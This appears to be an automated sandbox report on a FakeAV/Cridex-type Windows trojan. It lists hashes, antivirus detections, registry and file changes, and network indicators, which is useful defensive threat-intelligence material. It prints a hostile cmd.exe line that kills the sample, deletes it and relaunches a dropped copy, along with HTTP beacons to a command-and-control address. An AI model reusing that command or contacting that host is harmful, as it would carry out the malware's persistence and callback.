Analysis Date: 2015-06-12 11:53:36
MD5: 2ea0fb464ec95e2891b53b5169ac6d18
SHA1: 8cf6f9abbeb1781363f4d754bf723e8cac3a1c48

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: 044f106645114e61cc4f40a0d03fabb5 sha1: d43ff85a37bc3047a10edde76ccd562812aa7cca size: 177664
Section .rdata: md5: a70ff8d70135678c0284301ac13ceb15 sha1: f859623c33ce10d8d7500e106dc8b55776794bfb size: 1024
Section .data: md5: 8ba515e9c32e0299198f4fc241cf3636 sha1: b1ba8e8d322dfef27e90fb72c5b0e95a4650963d size: 68608
Section .rsrc: md5: 416020fa00102773c7d3315dd43f9520 sha1: 6480f52fc8afa259b3e1cf752e74af6a51418bca size: 3072
Timestamp: 2005-07-25 23:41:08
PEhash: deb6b7a4e1e6e9a1ba70784bf46a892b7aeeb08b
IMPhash: 588d231519d970eb442e9625fe8b8c0c
AV CA (E-Trust Ino): Win32/FakeSpypro.B!generic
AV F-Secure: Gen:Heur.Cridex.2
AV Dr. Web: Trojan.Fakealert.19447
AV ClamAV: Win.Trojan.Fakeav-30342
AV Arcabit (arcavir): Gen:Heur.Cridex.2
AV BullGuard: Gen:Heur.Cridex.2
AV Padvish: no_virus
AV VirusBlokAda (vba32): SScope.Malware-Cryptor.Maxplus.0997
AV CAT (quickheal): no_virus
AV Trend Micro: TROJ_FAKEAV.SMID
AV Kaspersky: Packed.Win32.Krap.ic
AV Zillya!: Trojan.FakeAV.Win32.37859
AV Emsisoft: Gen:Heur.Cridex.2
AV Ikarus: Packer.Win32.Krap
AV Frisk (f-prot): W32/FakeAlert.JH.gen!Eldorado
AV Authentium: W32/FakeAlert.JH.gen!Eldorado
AV MalwareBytes: Rogue.SecurityShield
AV MicroWorld (escan): Gen:Heur.Cridex.2
AV Microsoft Security Essentials: Rogue:Win32/Winwebsec
AV K7: Trojan ( 001cdda01 )
AV BitDefender: Gen:Heur.Cridex.2
AV Fortinet: W32/FakeAV.PACK!tr
AV Symantec: Trojan.FakeAV!gen39
AV Grisoft (avg): Cryptic.BSC
AV Eset (nod32): Win32/Kryptik.JDB
AV Alwil (avast): MalOb-EY [Cryp]
AV Ad-Aware: Gen:Heur.Cridex.2
AV Twister: Suspicious.558BEC81EC3C0.mg
AV Avira (antivir): TR/Crypt.XPACK.Gen
AV Mcafee: FakeAlert-SecurityTool.w
AV Rising: no_virus

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: PIPE\wkssvc
Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\1698158810.exe
Creates Process: "C:\WINDOWS\system32\cmd.exe" /c taskkill /f /pid 1360 & ping -n 3 127.1 & del /f /q "C:\malware.exe" & start C:\Documents and Settings\Administrator\Local Settings\Application Data\169815~1.EXE -f
Creates Mutex: i'm here

Process
↳ "C:\WINDOWS\system32\cmd.exe" /c taskkill /f /pid 1360 & ping -n 3 127.1 & del /f /q "C:\malware.exe" & start C:\Documents and Settings\Administrator\Local Settings\Application Data\169815~1.EXE -f

Creates Process: ping -n 3 127.1
Creates Process: taskkill /f /pid 1360
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Application Data\169815~1.EXE -f

Process
↳ taskkill /f /pid 1360

Creates File: PIPE\lsarpc

Process
↳ ping -n 3 127.1

Winsock DNS: 127.1

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Application Data\169815~1.EXE -f

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: i'm here
Winsock DNS: 178.238.227.4

Network Details:

HTTP GET: http://178.238.227.4/cb_soft.php?q=f841b8aed3d7c980e2509022d35e77fe&uk=0
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
HTTP GET: http://178.238.227.4/cb_soft.php?q=f841b8aed3d7c980e2509022d35e77fe&yu=0
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
HTTP GET: http://178.238.227.4/cb_soft.php?q=f841b8aed3d7c980e2509022d35e77fe&xq=0
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
Flows TCP: 192.168.1.1:1031 ➝ 178.238.227.4:80
Flows TCP: 192.168.1.1:1031 ➝ 178.238.227.4:80
Flows TCP: 192.168.1.1:1032 ➝ 178.238.227.4:80
Flows TCP: 192.168.1.1:1033 ➝ 178.238.227.4:80

Raw Pcap

Strings